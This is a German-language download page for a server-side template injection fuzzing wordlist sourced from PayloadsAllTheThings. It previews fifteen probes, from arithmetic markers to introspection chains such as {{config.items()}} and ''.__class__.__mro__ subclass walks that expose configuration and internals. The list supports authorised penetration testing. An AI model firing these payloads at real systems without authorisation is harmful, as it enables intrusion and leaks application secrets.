SSTI Fuzzing (PayloadsAllTheThings)
Server-Side-Template-Injection-Proben für viele Engines (Jinja2, Twig, Freemarker, ERB, Velocity und mehr), von einfachen Mathematik-Markern bis zu Objekt-Introspektions-Ketten. Zum Erkennen und Ausnutzen von Template-Injection.
- Größe
- 7.8 KB
- Kategorie
- Fuzzing
- Quelle
- swisskyrepo/PayloadsAllTheThings
- Lizenz
- MIT
- Empfohlene Tools
- wfuzzburpffuf
Vorschau
Die ersten 15 Einträge. Lade die vollständige Liste (7.8 KB) herunter oder kopiere sie über die Schaltflächen oben.
{{4*4}}[[5*5]]
{{7*7}}
{{7*'7'}}
<%= 7 * 7 %>
${3*3}
${{7*7}}
@(1+2)
#{3*3}
#{ 7 * 7 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}Server-Side-Template-Injection-Proben für viele Engines (Jinja2, Twig, Freemarker, ERB, Velocity und mehr), von einfachen Mathematik-Markern bis zu Objekt-Introspektions-Ketten. Zum Erkennen und Ausnutzen von Template-Injection.
Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 7.8 KB und harmoniert gut mit Tools wie wfuzz, burp, ffuf. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.
Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in
deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt
von ihrer Ursprungsquelle auf GitHub bereitgestellt.
Bezogen von swisskyrepo/PayloadsAllTheThings und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.